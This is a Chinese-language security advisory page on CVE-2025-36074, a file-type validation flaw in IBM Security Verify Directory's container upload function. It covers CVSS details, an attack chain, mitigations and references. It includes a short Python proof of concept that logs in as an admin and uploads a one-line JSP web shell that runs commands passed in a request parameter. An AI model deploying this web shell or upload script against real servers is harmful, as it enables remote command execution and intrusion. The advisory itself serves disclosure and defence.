CVE-2025-36074 CVSS 5.5 中危

CVE-2025-36074 IBM Security Verify Directory恶意文件上传漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-36074

漏洞类型

文件上传漏洞

CVSS评分

5.5 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

IBM Security Verify Directory (Container)

漏洞概述

IBM Security Verify Directory (Container) 10.0.0至10.0.0.3版本存在安全漏洞。由于系统未对上传文件的类型进行严格验证，具有高权限的用户可能上传恶意文件。攻击者可利用此漏洞将恶意文件植入系统，并可能将其分发给受害者，进而对系统执行后续攻击，导致系统完整性受损及可用性降低。

技术细节

该漏洞源于IBM Security Verify Directory (Container)在处理文件上传功能时，缺乏对文件类型的有效校验机制。根据CVSS 3.1评分向量，该漏洞的攻击复杂度为低（AC:L），攻击向量为网络（AV:N），但需要高权限用户（PR:H）才能发起攻击。攻击者利用此漏洞，可以通过应用程序接口上传任意类型的文件（如包含恶意脚本的文件）。由于系统未正确验证文件扩展名或内容（MIME类型），这些文件可能被存储在服务器上。随后，攻击者可以诱导受害者访问或下载这些恶意文件，从而触发进一步的攻击行为。该漏洞对系统完整性的影响为高，可用性影响为低。

攻击链分析

STEP 1

获取高权限账户

攻击者首先需要获取IBM Security Verify Directory的高权限用户凭证，因为该漏洞需要高权限（PR:H）才能利用。

STEP 2

构造恶意文件

攻击者准备一个包含恶意代码的文件，由于系统未验证文件类型，攻击者可以伪装文件扩展名或直接上传脚本文件。

STEP 3

上传恶意文件

攻击者利用高权限账户登录系统，通过存在漏洞的上传接口将恶意文件上传至服务器。

STEP 4

执行进一步攻击

攻击者将上传的恶意文件链接发送给受害者，诱导其访问或执行，从而破坏系统完整性或降低可用性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2025-36074 - Malicious File Upload
# Note: This is a conceptual demonstration based on the vulnerability description.

target_url = "https://target-server.com/upload_endpoint"
login_url = "https://target-server.com/login"

# 1. Authenticate as a privileged user
credentials = {
    "username": "admin",
    "password": "password"
}
session = requests.Session()
session.post(login_url, data=credentials)

# 2. Prepare malicious file
malicious_file = {'file': ('exploit.jsp', '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>', 'application/octet-stream')}

# 3. Upload the file
response = session.post(target_url, files=malicious_file)

if response.status_code == 200:
    print("File uploaded successfully.")
else:
    print("Upload failed.")

影响范围

10.0.0

10.0.0.1

10.0.0.2

10.0.0.3

防御指南

临时缓解措施

建议管理员限制特权用户的网络访问权限，并在应用补丁前，严格监控文件上传行为，对所有上传文件进行病毒扫描和内容过滤，防止恶意文件进入系统。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-36074
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-36074
3 Details https://www.cvedetails.com/cve/CVE-2025-36074/
4 VulDB https://vuldb.com/cve/CVE-2025-36074
5 Link https://www.ibm.com/support/pages/node/7268907

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表